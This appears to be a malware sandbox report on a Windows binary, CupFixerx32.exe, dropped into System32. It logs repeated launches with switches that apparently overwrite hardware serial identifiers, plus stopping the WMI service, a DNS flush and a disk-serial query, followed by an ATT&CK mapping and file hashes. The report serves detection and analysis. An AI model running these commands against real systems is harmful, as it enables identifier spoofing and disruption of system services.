C:\Windows\system32\cmd.execmd /c C:\Windows\System32\CupFixerx32.exe /SU "AUTO"3⤵PID:4348
-
C:\Windows\System32\CupFixerx32.exeC:\Windows\System32\CupFixerx32.exe /SU "AUTO"4⤵
- Cerber
- Executes dropped EXE
PID:4032
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cmd /c C:\Windows\System32\CupFixerx32.exe /SK "T6FTRVDXHN99XP9Z"2⤵PID:4492
-
C:\Windows\system32\cmd.execmd /c C:\Windows\System32\CupFixerx32.exe /SK "T6FTRVDXHN99XP9Z"3⤵PID:4560
-
C:\Windows\System32\CupFixerx32.exeC:\Windows\System32\CupFixerx32.exe /SK "T6FTRVDXHN99XP9Z"4⤵
- Cerber
- Executes dropped EXE
PID:8
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cmd /c C:\Windows\System32\CupFixerx32.exe /BM "AsRock"2⤵PID:868
-
C:\Windows\system32\cmd.execmd /c C:\Windows\System32\CupFixerx32.exe /BM "AsRock"3⤵PID:836
-
C:\Windows\System32\CupFixerx32.exeC:\Windows\System32\CupFixerx32.exe /BM "AsRock"4⤵
- Cerber
- Executes dropped EXE
PID:2980
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cmd /c C:\Windows\System32\CupFixerx32.exe /BP "P-8560M-C-2024"2⤵PID:4244
-
C:\Windows\system32\cmd.execmd /c C:\Windows\System32\CupFixerx32.exe /BP "P-8560M-C-2024"3⤵PID:2312
-
C:\Windows\System32\CupFixerx32.exeC:\Windows\System32\CupFixerx32.exe /BP "P-8560M-C-2024"4⤵
- Cerber
- Executes dropped EXE
PID:4284
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cmd /c C:\Windows\System32\CupFixerx32.exe /BS "UPUGL032FHVBP1TX"2⤵PID:3044
-
C:\Windows\system32\cmd.execmd /c C:\Windows\System32\CupFixerx32.exe /BS "UPUGL032FHVBP1TX"3⤵PID:2988
-
C:\Windows\System32\CupFixerx32.exeC:\Windows\System32\CupFixerx32.exe /BS "UPUGL032FHVBP1TX"4⤵
- Cerber
- Executes dropped EXE
PID:920
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cmd /c C:\Windows\System32\CupFixerx32.exe /BT "Default String"2⤵PID:2396
-
C:\Windows\system32\cmd.execmd /c C:\Windows\System32\CupFixerx32.exe /BT "Default String"3⤵PID:4224
-
C:\Windows\System32\CupFixerx32.exeC:\Windows\System32\CupFixerx32.exe /BT "Default String"4⤵
- Cerber
- Executes dropped EXE
PID:2544
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cmd /c C:\Windows\System32\CupFixerx32.exe /BLC "Default String"2⤵PID:3244
-
C:\Windows\system32\cmd.execmd /c C:\Windows\System32\CupFixerx32.exe /BLC "Default String"3⤵PID:420
-
C:\Windows\System32\CupFixerx32.exeC:\Windows\System32\CupFixerx32.exe /BLC "Default String"4⤵
- Cerber
- Executes dropped EXE
PID:1056
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cmd /c C:\Windows\System32\CupFixerx32.exe /CM "Default String"2⤵PID:2604
-
C:\Windows\system32\cmd.execmd /c C:\Windows\System32\CupFixerx32.exe /CM "Default String"3⤵PID:2728
-
C:\Windows\System32\CupFixerx32.exeC:\Windows\System32\CupFixerx32.exe /CM "Default String"4⤵
- Cerber
- Executes dropped EXE
PID:4580
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cmd /c C:\Windows\System32\CupFixerx32.exe /CV "Default String"2⤵PID:3436
-
C:\Windows\system32\cmd.execmd /c C:\Windows\System32\CupFixerx32.exe /CV "Default String"3⤵PID:2316
-
C:\Windows\System32\CupFixerx32.exeC:\Windows\System32\CupFixerx32.exe /CV "Default String"4⤵
- Cerber
- Executes dropped EXE
PID:4496
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cmd /c C:\Windows\System32\CupFixerx32.exe /CS "I6DMKVT7A3MFOBXT"2⤵PID:1228
-
C:\Windows\system32\cmd.execmd /c C:\Windows\System32\CupFixerx32.exe /CS "I6DMKVT7A3MFOBXT"3⤵PID:1072
-
C:\Windows\System32\CupFixerx32.exeC:\Windows\System32\CupFixerx32.exe /CS "I6DMKVT7A3MFOBXT"4⤵
- Cerber
- Executes dropped EXE
PID:4984
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cmd /c C:\Windows\System32\CupFixerx32.exe /CA "Default String"2⤵PID:2576
-
C:\Windows\system32\cmd.execmd /c C:\Windows\System32\CupFixerx32.exe /CA "Default String"3⤵PID:1480
-
C:\Windows\System32\CupFixerx32.exeC:\Windows\System32\CupFixerx32.exe /CA "Default String"4⤵
- Cerber
- Executes dropped EXE
PID:4848
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cmd /c C:\Windows\System32\CupFixerx32.exe /CSK "CGUCS-51079"2⤵PID:4700
-
C:\Windows\system32\cmd.execmd /c C:\Windows\System32\CupFixerx32.exe /CSK "CGUCS-51079"3⤵PID:2188
-
C:\Windows\System32\CupFixerx32.exeC:\Windows\System32\CupFixerx32.exe /CSK "CGUCS-51079"4⤵
- Cerber
- Executes dropped EXE
PID:3188
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cmd /c C:\Windows\System32\CupFixerx32.exe /PSN "AIA7N2Q3K6DQ4RSN"2⤵PID:1560
-
C:\Windows\system32\cmd.execmd /c C:\Windows\System32\CupFixerx32.exe /PSN "AIA7N2Q3K6DQ4RSN"3⤵PID:4892
-
C:\Windows\System32\CupFixerx32.exeC:\Windows\System32\CupFixerx32.exe /PSN "AIA7N2Q3K6DQ4RSN"4⤵
- Cerber
- Executes dropped EXE
PID:2556
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cmd /c C:\Windows\System32\CupFixerx32.exe /PAT "DPPHK3ZPU8CJ6HXQ"2⤵PID:3460
-
C:\Windows\system32\cmd.execmd /c C:\Windows\System32\CupFixerx32.exe /PAT "DPPHK3ZPU8CJ6HXQ"3⤵PID:3368
-
C:\Windows\System32\CupFixerx32.exeC:\Windows\System32\CupFixerx32.exe /PAT "DPPHK3ZPU8CJ6HXQ"4⤵
- Cerber
- Executes dropped EXE
PID:3908
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵PID:2896
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop winmgmt /y2⤵PID:3428
-
C:\Windows\system32\net.exenet stop winmgmt /y3⤵PID:3280
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop winmgmt /y4⤵PID:3264
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net start winmgmt /y2⤵PID:3724
-
C:\Windows\system32\net.exenet start winmgmt /y3⤵PID:4008
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start winmgmt /y4⤵PID:2244
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop winmgmt2⤵PID:4372
-
C:\Windows\system32\sc.exesc stop winmgmt3⤵
- Launches sc.exe
PID:4356
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc start winmgmt2⤵PID:4552
-
C:\Windows\system32\sc.exesc start winmgmt3⤵
- Launches sc.exe
PID:3984
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ipconfig /flushdns2⤵PID:1284
-
C:\Windows\system32\ipconfig.exeipconfig /flushdns3⤵
- Gathers network information
PID:3844
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵PID:4024
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic diskdrive get serialnumber2⤵PID:2380
-
C:\Windows\System32\Wbem\WMIC.exewmic diskdrive get serialnumber3⤵
- Suspicious use of AdjustPrivilegeToken
PID:840
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2540
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:3020
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1System Services
1Service Execution
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
451KB
MD5feac8b5c2d2b99e7a3c8f1ba41ba3472
SHA1002bd5344c44f288c22e69b5e2846d515bfa429e
SHA2567fce635cb66dc1286856a1f1f281b90431288be4a9647a8e0cbd2a0346748b95
SHA512b95b83545ca45453e6d64b7c2cf276932eded9658187aa91dcff948e59c313ae071b0059a481cd7b01aae778fc4fda71aa830fb99b84197fb17e03e9a10e8e68
-
Filesize
394KB
MD58464ecc3ff18a9adc217112c63f0bd95
SHA1bf98f20460ab755a81269edd61ddfc39d6e58a68
SHA2567adb87b96253096e5d42754a77de2ec090f3a8f5e1aea34958d3118a5fa461ca
SHA5123fda9e0f9325b14ffa82e71962f7c9ed1b764dc570162c4acdf0bc42b73827102835820c66f30fd5bd64e5a4dea513ac0c6cdde8b2a87212f337944359b818c9
-
Filesize
29KB
MD5f22740ba54a400fd2be7690bb204aa08
SHA15812387783d61c6ab5702213bb968590a18065e3
SHA25665c26276cadda7a36f8977d1d01120edb5c3418be2317d501761092d5f9916c9
SHA512ac1f89736cf348f634b526569b5783118a1a35324f9ce2f2804001e5a04751f8cc21d09bfa1c4803cd14a64152beba868f5ecf119f10fa3ccbe680d2fb481500